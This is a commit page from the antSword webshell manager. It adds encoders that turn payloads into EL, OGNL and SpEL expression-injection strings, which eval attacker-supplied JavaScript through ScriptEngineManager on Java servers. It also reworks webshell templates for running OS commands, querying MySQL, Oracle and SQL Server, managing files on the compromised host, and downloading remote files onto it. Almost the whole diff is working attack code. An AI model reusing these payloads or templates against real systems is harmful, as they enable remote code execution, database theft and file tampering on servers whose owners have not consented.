Skip to content

A
antSword
Commit fae7b691 authored by yzddmr6's avatar yzddmr6 Committed by Medicean
Browse files
Options

(Enhance:Core/JSPJS)兼容各种表达式注入

parent e856a271
Show whitespace changes
Inline Side-by-side
Showing with 109 additions and 135 deletions
source/core/jspjs/encoder/el.js 0 → 100644
View file @ fae7b691
'use strict';
module.exports = (pwd, data, ext = null) => {
let randomID;
if (ext.opts.otherConf['use-random-variable'] === 1) {
randomID = antSword.utils.RandomChoice(antSword['RANDOMWORDS']);
} else {
randomID = `${antSword['utils'].RandomLowercase()}${Math.random().toString(16).substr(2)}`;
}
data[pwd] = `\${"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval(pageContext.request.getParameter("${randomID}"))}`;
data[randomID]=data['_'];
delete data['_'];
return data;
}
source/core/jspjs/encoder/ognl.js 0 → 100644
View file @ fae7b691
'use strict';
module.exports = (pwd, data, ext = null) => {
data[pwd] = `(new javax.script.ScriptEngineManager()).getEngineByName("js").eval(new String(@com.sun.org.apache.xml.internal.security.utils.Base64@decode('${Buffer.from(data['_']).toString('base64')}')))`;
delete data['_'];
return data;
}
source/core/jspjs/encoder/spelbase64.js 0 → 100644
View file @ fae7b691
'use strict';
module.exports = (pwd, data, ext = null) => {
data[pwd] = `T(javax.script.ScriptEngineManager).newInstance().getEngineByName("js").eval(new String(T(com.sun.org.apache.xml.internal.security.utils.Base64).decode('${Buffer.from(data['_']).toString('base64')}')))`;
delete data['_'];
return data;
}
source/core/jspjs/index.js
View file @ fae7b691
......@@ -41,7 +41,7 @@ class JSPJS extends Base {
* @return {array} 编码器列表
*/
get encoders() {
return [];
return ["spelbase64","el","ognl"];
}
get decoders() {
......@@ -99,9 +99,6 @@ class JSPJS extends Base {
var tag_s = "${tag_s.substr(0,tag_s.length/2)}"+"${tag_s.substr(tag_s.length/2)}";
var tag_e = "${tag_e.substr(0,tag_e.length/2)}"+"${tag_e.substr(tag_e.length/2)}";
try {
response.setContentType("text/html");
request.setCharacterEncoding(cs);
response.setCharacterEncoding(cs);
function decode(str) {
str = str.substr(#randomPrefix#);
var bt=Base64DecodeToByte(str);
......@@ -123,9 +120,12 @@ class JSPJS extends Base {
} catch (e) {
output.append("ERROR:// " + e.toString());
}
var result=tag_s + asenc(output.toString()) + tag_e;
try {
response.getWriter().print(tag_s + asenc(output.toString()) + tag_e);
} catch (e) {}
response.getWriter().print(result);
} catch (e) {
result;
}
`.replace(/\n\s+/g, '').replace(/#randomPrefix#/g, this.__opts__.otherConf["random-Prefix"]);
// 使用编码器进行处理并返回
return this.encodeComplete(tag_s, tag_e, data);
......
source/core/jspjs/template/command.js
View file @ fae7b691
......@@ -46,15 +46,12 @@ module.exports = (arg1, arg2, arg3) => ({
return osname.startsWith("win");
}
var cmdPath = decode(request.getParameter("${arg1}"));
var command = decode(request.getParameter("${arg2}"));
var envstr = decode(request.getParameter("${arg3}"));
var cmdPath = decode("#{newbase64::bin}");
var command = decode("#{newbase64::cmd}");
var envstr = decode("#{newbase64::env}");
output.append(ExecuteCommandCode(cmdPath, command, envstr));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::bin}",
[arg2]: "#{newbase64::cmd}",
[arg3]: "#{newbase64::env}",
},
listcmd: {
_: `
......@@ -71,9 +68,8 @@ module.exports = (arg1, arg2, arg3) => ({
}
return ret;
}
var z1 = decode(request.getParameter("${arg1}"));
var z1 = decode("#{newbase64::binarr}");
output.append(ListcmdCode(z1));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::binarr}",
},
});
source/core/jspjs/template/database/mysql.js
View file @ fae7b691
......@@ -47,12 +47,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z1 = decode("#{newbase64::encode}");
var z2 = decode("#{newbase64::conn}");
output.append(showDatabases(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::encode}",
[arg2]: "#{newbase64::conn}",
},
show_tables: {
_: `
......@@ -92,14 +90,11 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
var z1 = decode("#{newbase64::encode}");
var z2 = decode("#{newbase64::conn}");
var z3 = decode("#{newbase64::db}");
output.append(showTables(z1, z2, z3));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::encode}",
[arg2]: "#{newbase64::conn}",
[arg3]: "#{newbase64::db}",
},
show_columns: {
_: `
......@@ -139,16 +134,12 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
var z4 = decode(request.getParameter("${arg4}"));
var z1 = decode("#{newbase64::encode}");
var z2 = decode("#{newbase64::conn}");
var z3 = decode("#{newbase64::db}");
var z4 = decode("#{newbase64::table}");
output.append(showColumns(z1, z2, z3, z4));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::encode}",
[arg2]: "#{newbase64::conn}",
[arg3]: "#{newbase64::db}",
[arg4]: "#{newbase64::table}",
},
query: {
_: `
......@@ -213,13 +204,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
var rowsep = "\\r\\n";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
var z1 = decode("#{newbase64::encode}");
var z2 = decode("#{newbase64::conn}");
var z3 = decode("#{newbase64::sql}");
output.append(query(z1, z2, z3));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::encode}",
[arg2]: "#{newbase64::conn}",
[arg3]: "#{newbase64::sql}",
},
});
source/core/jspjs/template/database/oracle.js
View file @ fae7b691
......@@ -47,11 +47,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(showDatabases(z1, z2));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}'
var z1 = decode("#{newbase64::encode}");
var z2 = decode("#{newbase64::conn}");
output.append(showDatabases(z1, z2));
`.replace(/\n\s+/g, ""),
},
show_tables: {
_: `
......@@ -94,13 +93,11 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
output.append(showTables(z1, z2, z3));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}',
[arg3]: '#{newbase64::db}'
var z1 = decode("#{newbase64::encode}");
var z2 = decode("#{newbase64::conn}");
var z3 = decode("#{newbase64::db}");
output.append(showTables(z1, z2, z3));
`.replace(/\n\s+/g, ""),
},
show_columns: {
_: `function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
......@@ -139,15 +136,12 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
var z4 = decode(request.getParameter("${arg4}"));
output.append(showColumns(z1, z2, z3, z4));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}',
[arg3]: '#{newbase64::db}',
[arg4]: '#{newbase64::table}'
var z1 = decode("#{newbase64::encode}");
var z2 = decode("#{newbase64::conn}");
var z3 = decode("#{newbase64::db}");
var z4 = decode("#{newbase64::table}");
output.append(showColumns(z1, z2, z3, z4));
`.replace(/\n\s+/g, ""),
},
query: {
_: `
......@@ -214,13 +208,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
var rowsep = "\\r\\n";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
output.append(query(z1, z2, z3));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}',
[arg3]: '#{newbase64::sql}'
var z1 = decode("#{newbase64::encode}");
var z2 = decode("#{newbase64::conn}");
var z3 = decode("#{newbase64::sql}");
output.append(query(z1, z2, z3));
`.replace(/\n\s+/g, ""),
}
})
\ No newline at end of file
source/core/jspjs/template/database/sqlserver.js
View file @ fae7b691
......@@ -46,11 +46,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
var rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(showDatabases(z1, z2));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}'
var z1 = decode("#{newbase64::encode}");
var z2 = decode("#{newbase64::conn}");
output.append(showDatabases(z1, z2));
`.replace(/\n\s+/g, ""),
},
show_tables: {
_: `
......@@ -89,14 +88,11 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
var rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
output.append(showTables(z1, z2, z3));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}',
[arg3]: '#{newbase64::db}'
var z1 = decode("#{newbase64::encode}");
var z2 = decode("#{newbase64::conn}");
var z3 = decode("#{newbase64::db}");
output.append(showTables(z1, z2, z3));
`.replace(/\n\s+/g, ""),
},
show_columns: {
_: `function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
......@@ -134,15 +130,12 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
var sql = "SELECT TOP 1 * FROM " + dbname + "." + table;
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
var z4 = decode(request.getParameter("${arg4}"));
output.append(showColumns(z1, z2, z3, z4));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}',
[arg3]: '#{newbase64::db}',
[arg4]: '#{newbase64::table}'
var z1 = decode("#{newbase64::encode}");
var z2 = decode("#{newbase64::conn}");
var z3 = decode("#{newbase64::db}");
var z4 = decode("#{newbase64::table}");
output.append(showColumns(z1, z2, z3, z4));
`.replace(/\n\s+/g, ""),
},
query: {
_: `
......@@ -210,13 +203,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
output.append(query(z1, z2, z3));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}',
[arg3]: '#{newbase64::sql}'
var z1 = decode("#{newbase64::encode}");
var z2 = decode("#{newbase64::conn}");
var z3 = decode("#{newbase64::sql}");
output.append(query(z1, z2, z3));
`.replace(/\n\s+/g, ""),
}
})
\ No newline at end of file
source/core/jspjs/template/filemanager.js
View file @ fae7b691
......@@ -31,10 +31,9 @@ module.exports = (arg1, arg2, arg3) => ({
s += sF;
return s;
}
var dirPath=decode(request.getParameter("${arg1}"));
var dirPath=decode("#{newbase64::path}");
output.append(FileTreeCode(dirPath));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
},
delete: {
......@@ -53,10 +52,9 @@ module.exports = (arg1, arg2, arg3) => ({
return "1";
}
var fileOrDirPath = decode(request.getParameter("${arg1}"));
var fileOrDirPath = decode("#{newbase64::path}");
output.append(DeleteFileOrDirCode(fileOrDirPath));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
},
create_file: {
......@@ -87,13 +85,11 @@ module.exports = (arg1, arg2, arg3) => ({
return sb.toString();
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z1 = decode("#{newbase64::path}");
var z2 = decode("#{newbase64::content}");
output.append(WriteFileCode(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::content}",
},
read_file: {
......@@ -111,10 +107,9 @@ module.exports = (arg1, arg2, arg3) => ({
return s;
}
var z1 = decode(request.getParameter("${arg1}"));
var z1 = decode("#{newbase64::path}");
output.append(ReadFileCode(z1));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
},
copy: {
......@@ -146,12 +141,10 @@ module.exports = (arg1, arg2, arg3) => ({
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z1 = decode("#{newbase64::path}");
var z2 = decode("#{newbase64::target}");
output.append(CopyFileOrDirCode(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::target}",
},
download_file: {
......@@ -169,10 +162,9 @@ module.exports = (arg1, arg2, arg3) => ({
os.close();
is.close();
}
var z1 = decode(request.getParameter("${arg1}"));
var z1 = decode("#{newbase64::path}");
output.append(DownloadFileCode(z1, response));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
},
upload_file: {
......@@ -191,12 +183,10 @@ module.exports = (arg1, arg2, arg3) => ({
os.close();
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z1 = decode("#{newbase64::path}");
var z2 = decode("#{buffer::content}");
output.append(UploadFileCode(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
[arg2]: "#{buffer::content}",
},
rename: {
......@@ -207,12 +197,10 @@ module.exports = (arg1, arg2, arg3) => ({
sf.renameTo(df);
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z1 = decode("#{newbase64::path}");
var z2 = decode("#{newbase64::name}");
output.append(RenameFileOrDirCode(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::name}",
},
retime: {
......@@ -224,12 +212,10 @@ module.exports = (arg1, arg2, arg3) => ({
f.setLastModified(dt.getTime());
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z1 = decode("#{newbase64::path}");
var z2 = decode("#{newbase64::time}");
output.append(ModifyFileOrDirTimeCode(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::time}",
},
chmod: {
......@@ -271,11 +257,9 @@ module.exports = (arg1, arg2, arg3) => ({
}
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z1 = decode("#{newbase64::path}");
var z2 = decode("#{newbase64::mode}");
output.append(ChmodCode(z1, z2));`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::mode}",
},
mkdir: {
......@@ -285,10 +269,9 @@ module.exports = (arg1, arg2, arg3) => ({
f.mkdir();
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z1 = decode("#{newbase64::path}");
output.append(CreateDirCode(z1));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
},
wget: {
......@@ -308,11 +291,9 @@ module.exports = (arg1, arg2, arg3) => ({
h.disconnect();
return "1";
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z1 = decode("#{newbase64::url}");
var z2 = decode("#{newbase64::path}");
output.append(WgetCode(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::url}",
[arg2]: "#{newbase64::path}",
},
});
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment